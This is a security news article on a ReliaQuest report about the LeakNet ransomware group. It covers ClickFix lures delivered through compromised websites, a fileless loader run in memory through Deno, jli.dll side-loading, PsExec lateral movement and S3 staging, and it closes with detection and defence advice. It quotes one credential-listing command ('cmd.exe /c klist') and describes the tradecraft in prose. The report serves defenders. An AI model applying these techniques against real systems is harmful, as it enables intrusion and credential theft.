ReliaQuest has identified new tactics from ransomware operator LeakNet, including a social engineering approach known as ClickFix delivered through compromised websites and a loader built on the Deno runtime that runs largely in memory.
The changes mark a shift in how LeakNet gains an initial foothold in victim environments, along with a new execution method designed to blend in with legitimate developer tooling. ReliaQuest linked the activity to LeakNet “with high confidence” in several recent incidents, citing infrastructure and tactics consistent with previous cases.
LeakNet has averaged about three victims per month, according to the analysis, but the group has been “scaling up and shifting tactics”. The new methods reduce reliance on initial access brokers, which typically sell stolen credentials or pre-built access to compromised systems.
ClickFix lure
ClickFix uses prompts on web pages to persuade a user to run a command, often framed as an error fix or verification step. In the incidents analysed, the lure appeared on legitimate but compromised websites that users reached through normal browsing.
The ClickFix pages prompted users to run a Windows Installer command through msiexec. That command downloaded and ran a loader associated with LeakNet. The delivery appeared opportunistic rather than targeted: any employee who encounters the lure could become an entry point.
ClickFix has also spread rapidly across the threat landscape, facilitating delivery of 59% of the top malware families tracked in 2025, according to the report. This adoption changes what defenders can monitor, since campaigns delivered via compromised sites may not show the same network indicators as attacker-owned infrastructure.
The analysis highlighted detection opportunities after the user action, including suspicious msiexec activity, unusual command lines and outbound connections to external infrastructure.
Deno loader
Alongside the change in initial access, ReliaQuest described a “previously unreported” loader based on Deno, a runtime used to execute JavaScript and TypeScript. LeakNet uses Deno as a “bring your own runtime” approach, installing the legitimate Deno executable and running malicious code inside it rather than deploying a custom loader.
In the observed activity, scripts initiated the process through Visual Basic Script and PowerShell files with names such as Romeo*.ps1 and Juliet*.vbs. The loader executed a base64-encoded payload in memory via a Deno command line that passed the code as a data URL.
The loader collected basic system details, including username, hostname, total system memory and operating system release. It then created a victim identifier, contacted attacker-controlled infrastructure, selected a command-and-control endpoint and requested a second-stage payload. It also attempted to bind to a local port before entering a polling loop that repeatedly fetched and executed additional code through Deno.
Running code in memory leaves fewer conventional artefacts on disk, which can reduce the effectiveness of file-scanning and signature-based tools. Allowlists and unknown-binary controls can also be less effective when the executable is legitimate and signed. ReliaQuest recommended focusing on behaviour, including unusual Deno usage outside development environments, command-line arguments, parent-child process chains and unexpected network activity.
Repeatable chain
Despite the changing entry points, ReliaQuest observed a consistent post-exploitation chain in every confirmed LeakNet incident. It included jli.dll side-loading into Java in the USOShared directory, PsExec-based lateral movement and payload staging in Amazon S3 buckets.
The DLL side-loading used a legitimate Java process as a carrier. Attackers placed a malicious jli.dll in “C:\ProgramData\USOShared”, a directory associated with Windows Update activity. The technique can appear routine at first glance because it uses familiar processes and locations.
After execution, activity moved to command-and-control communications. Beaconing occurred to multiple domains across incidents while maintaining a consistent URL structure. Lateral movement used PsExec, a legitimate administrative tool. The group also ran “cmd.exe /c klist” to list active authentication credentials on the compromised system before moving to other hosts.
For staging and exfiltration, LeakNet used S3 buckets, which can resemble normal cloud traffic. The report listed indicators including specific domains and S3 bucket addresses associated with the observed activity.
Other routes
ReliaQuest also reported a separate intrusion attempt using Microsoft Teams phishing to persuade a user to download and run an MSI and a VBS file, which then executed a similar Deno-based loader. Attribution for that incident remained inconclusive because it was remediated quickly, though the tooling and approach overlapped.
Defensive steps
The analysis recommended defensive measures focused on both entry and post-exploitation behaviour, including blocking newly registered domains, restricting Win-R access for non-technical users and limiting PsExec to authorised administrators through policy controls.
Defenders were also urged to look for a combination of signals, including unusual DLL side-loading in non-standard directories, anomalous PsExec usage and unexpected outbound connections to S3 from systems that do not usually communicate with those services.
“LeakNet is at an inflection point, and the window to get ahead of what comes next is now. The move to self-directed ClickFix delivery, the introduction of a fileless in-memory loader, and a post-exploitation playbook that’s already proven successful across incidents aren’t isolated changes. They’re the building blocks of a group removing constraints on how quickly and broadly it can operate.”
ReliaQuest expects LeakNet to continue to ramp up, while similar fileless execution methods may spread to other threat actors as the technique becomes more widely observed.
